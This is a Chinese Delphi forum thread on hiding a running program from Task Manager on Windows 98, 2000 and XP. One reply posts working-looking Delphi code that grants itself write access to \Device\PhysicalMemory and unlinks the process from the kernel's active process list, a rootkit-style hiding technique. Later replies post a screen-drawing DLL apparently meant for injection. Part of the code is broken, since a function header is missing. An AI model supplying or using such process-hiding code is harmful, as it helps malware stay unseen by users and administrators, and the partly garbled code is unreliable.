怎么让运行的程序,在任务管理器中隐藏,要在98,2000,xp上都有效果。
解决方案 »
- 用正则 DIREGEX 如何正确替换中文不出乱码?
- 如何获取北京时间网中的时间(http://www.beijing-time.org/)
- 事务里面是不是要尽量减少代码?如果代码较多会有什么坏的影响?
- udp连接硬件设备
- 生成树目录时,释放指针出问题
- 请求帮忙噢,小弟对短信一点都不懂,想问问最基础的东西?:)
- 希望哪位报表高手能鼎立相助,这是我自己写的报表自定义程序,希望高手能帮忙修改一下,其他朋友也可共同学习!
- 既然发现了这个好东东,就和大家分享吧!
- 怎么在Service Application中抓屏幕截图。
- 如何去掉TDBGrid的垂直滚动条
- Delphi 有沒有像webbrowser控件,可以讀一段含HTML元素的內容並解釋顯示出來?
- 用SetLength分配的动态数组,在程序结束时需要人工释放内存吗?
邮箱 ahjoe&szonline.net (把&换成@)
邮箱 ahjoe&szonline.net (把&换成@)
===================================
没有代码吗?把dll发给我用用,我的mail:[email protected]
Windows, SysUtils, Variants, Classes, AclAPI, accCtrl;type
NTSTATUS = LongInt;const
//NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
OBJ_INHERIT = $00000002;
OBJ_PERMANENT = $00000010;
OBJ_EXCLUSIVE = $00000020;
OBJ_CASE_INSENSITIVE = $00000040;
OBJ_OPENIF = $00000080;
OBJ_OPENLINK = $00000100;
OBJ_KERNEL_HANDLE = $00000200;
OBJ_VALID_ATTRIBUTES = $000003F2;type
PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
IO_STATUS_BLOCK = record
Status: NTSTATUS;
FObject: DWORD;
end; PUNICODE_STRING = ^UNICODE_STRING;
UNICODE_STRING = record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end; POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
OBJECT_ATTRIBUTES = record
Length: DWORD;
RootDirectory: Pointer;
ObjectName: PUNICODE_STRING;
Attributes: DWORD;
SecurityDescriptor: Pointer;
SecurityQualityOfService: Pointer;
end; TZwOpenSection = function(SectionHandle: PHandle;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
SourceString: PWideChar); stdcall;var
RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
ZwOpenSection: TZwOpenSection = nil;
g_hNtDLL: THandle = 0;
g_pMapPhysicalMemory: Pointer = nil;
g_hMPM: THandle = 0;
g_hMPM2: THandle = 0;
g_osvi: OSVERSIONINFO;
b_hide: Boolean = false;
//---------------------------------------------------------------------------function InitNTDLL: Boolean;
begin
g_hNtDLL := LoadLibrary('ntdll.dll'); if 0 = g_hNtDLL then
begin
Result := false;
Exit;
end; RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection'); Result := True;
end;
//---------------------------------------------------------------------------procedure CloseNTDLL;
begin
if (0 <> g_hNtDLL) then
FreeLibrary(g_hNtDLL);
g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
pDacl: PACL;
pSD: PPSECURITY_DESCRIPTOR;
pNewDacl: PACL;
dwRes: DWORD;
ea: EXPLICIT_ACCESS;
begin
pDacl := nil;
pSD := nil;
pNewDacl := nil; dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD); if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end; ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions := SECTION_MAP_WRITE;
ea.grfAccessMode := GRANT_ACCESS;
ea.grfInheritance := NO_INHERITANCE;
ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
ea.Trustee.ptstrName := 'CURRENT_USER'; dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl); if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end; dwRes := SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil); if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end;end;
//---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;
var
status: NTSTATUS;
physmemString: UNICODE_STRING;
attributes: OBJECT_ATTRIBUTES;
PhyDirectory: DWORD;
begin
g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
GetVersionEx(g_osvi); if (5 <> g_osvi.dwMajorVersion) then
begin
Result := 0;
Exit;
end; case g_osvi.dwMinorVersion of
0: PhyDirectory := $30000;
1: PhyDirectory := $39000;
else
begin
Result := 0;
Exit;
end;
end; RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory'); attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
attributes.RootDirectory := nil;
attributes.ObjectName := @physmemString;
attributes.Attributes := 0;
attributes.SecurityDescriptor := nil;
attributes.SecurityQualityOfService := nil; status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes); if (status = STATUS_ACCESS_DENIED) then
begin
ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM); status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
end; if not (LongInt(status) >= 0) then
begin
Result := 0;
Exit;
end; g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000); if (g_pMapPhysicalMemory = nil) then
begin
Result := 0;
Exit;
end; Result := g_hMPM;
end;
//---------------------------------------------------------------------------
var
VAddr, PGDE, PTE, PAddr, tmp: DWORD;
begin
VAddr := DWORD(addr);
// PGDE := BaseAddress[VAddr shr 22];
PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // Modify by dot. if 0 = (PGDE and 1) then
begin
Result := nil;
Exit;
end; tmp := PGDE and $00000080; if (0 <> tmp) then
begin
PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);
end
else
begin
PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
// PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];
PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // Modify by dot. if (0 = (PTE and 1)) then
begin
Result := nil;
Exit;
end; PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);
UnmapViewOfFile(Pointer(PGDE));
end; Result := Pointer(PAddr);
end;
//---------------------------------------------------------------------------function GetData(addr: Pointer): DWORD;
var
phys, ret: DWORD;
tmp: PDWORD;
begin
phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
phys and $FFFFF000, $1000)); if (nil = tmp) then
begin
Result := 0;
Exit;
end;// ret := tmp[(phys and $FFF) shr 2];
ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // Modify by dot.
UnmapViewOfFile(tmp); Result := ret;
end;
//---------------------------------------------------------------------------function SetData(addr: Pointer; data: DWORD): Boolean;
var
phys: DWORD;
tmp: PDWORD;
begin
phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000)); if (nil = tmp) then
begin
Result := false;
Exit;
end;// tmp[(phys and $FFF) shr 2] := data;
PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // Modify by dot.
UnmapViewOfFile(tmp); Result := TRUE;
end;
//---------------------------------------------------------------------------
{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
begin
ExitProcess(0);
return 1 ;
end }
//---------------------------------------------------------------------------function YHideProcess: Boolean;
var
thread, process: DWORD;
fw, bw: DWORD;
begin
// SetUnhandledExceptionFilter(exeception);
if (FALSE = InitNTDLL) then
begin
Result := FALSE;
Exit;
end; if (0 = OpenPhysicalMemory) then
begin
Result := FALSE;
Exit;
end; thread := GetData(Pointer($FFDFF124)); //kteb
process := GetData(Pointer(thread + $44)); //kpeb if (0 = g_osvi.dwMinorVersion) then
begin
fw := GetData(Pointer(process + $A0));
bw := GetData(Pointer(process + $A4)); SetData(Pointer(fw + 4), bw);
SetData(Pointer(bw), fw); Result := TRUE;
end
else if (1 = g_osvi.dwMinorVersion) then
begin
fw := GetData(Pointer(process + $88));
bw := GetData(Pointer(process + $8C)); SetData(Pointer(fw + 4), bw);
SetData(Pointer(bw), fw); Result := TRUE;
end
else
begin
Result := False;
end; CloseHandle(g_hMPM);
CloseNTDLL;
end;function MyHideProcess: Boolean;
begin
if not b_hide then
begin
b_hide := YHideProcess;
end; Result := b_hide;
end;end.
你给的哪个,我测试过,在xp下也不行
unit UnitDll;interfaceuses
SysUtils,
Classes,
Windows,
Dialogs;var
hThreadHandle: Dword;
dwThreadID: Dword;
implementation{在左上角显示时间}
procedure ThreadProc;
var
hScreenDC: hdc;
SystemTime: _SYSTEMTIME;
Temp: string;
MyOutput: PChar;
begin
while true do
begin
Sleep(100);
hScreenDC := GetDC(0);
GetLocalTime(SystemTime);
Temp := format('Current Time is %d-%d-%d %d:%d:%d', [SystemTime.wYear,
SystemTime.wMonth,
SystemTime.wDay,
SystemTime.wHour,
SystemTime.wMinute,
SystemTime.wSecond]);
MyOutPut := Pchar(temp);
TextOut(hScreenDC, 0, 0, MyOutPut, lstrlen(MyOutPut));
ReleaseDC(0, hScreenDC);
end;
end;initialization
hThreadHandle := CreateThread(nil, 0, @ThreadProc, nil, 0, dwThreadID);
finalization
if (hThreadHandle <> 0) then
TerminateThread(hThreadHandle, 0);
end.
做成dll
unit UnitDll; interface uses
SysUtils,
Classes,
Windows,
Dialogs; var
hThreadHandle: Dword;
dwThreadID: Dword;
implementation {在左上角显示时间}
procedure ThreadProc;
var
hScreenDC: hdc;
SystemTime: _SYSTEMTIME;
Temp: string;
MyOutput: PChar;
begin
while true do
begin
Sleep(100);
hScreenDC := GetDC(0);
GetLocalTime(SystemTime);
Temp := format( 'Current Time is %d-%d-%d %d:%d:%d ', [SystemTime.wYear,
SystemTime.wMonth,
SystemTime.wDay,
SystemTime.wHour,
SystemTime.wMinute,
SystemTime.wSecond]);
MyOutPut := Pchar(temp);
TextOut(hScreenDC, 0, 0, MyOutPut, lstrlen(MyOutPut));
ReleaseDC(0, hScreenDC);
end;
end; initialization
hThreadHandle := CreateThread(nil, 0, @ThreadProc, nil, 0, dwThreadID);
finalization
if (hThreadHandle < > 0) then
TerminateThread(hThreadHandle, 0);
end.
做成dll
=================================没有看懂怎么用,你发个demo给我如何:[email protected]